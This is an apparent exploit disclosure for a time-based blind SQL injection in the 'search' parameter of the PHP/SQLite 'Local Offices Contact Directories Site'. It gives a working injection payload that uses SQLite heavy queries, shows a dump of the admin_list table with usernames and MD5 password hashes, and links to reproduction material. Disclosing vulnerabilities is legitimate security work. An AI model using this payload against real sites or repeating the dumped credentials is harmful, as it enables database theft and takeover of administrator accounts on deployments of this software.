https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html

## Vendor:
[href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html)

## Description:
The `search` parameter appears to be vulnerable to time-based blind
SQL injection attacks, on the web app "Local Offices Contact
Directories Site" (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump
hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal
sensitive information and can destroy the system administrative
account.


## Payload:
```sql
---
Parameter: search (GET)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245
AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
```
- dump

```sql
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
| cblake   | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421)

## Proof:
[href](https://streamable.com/zmm464)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>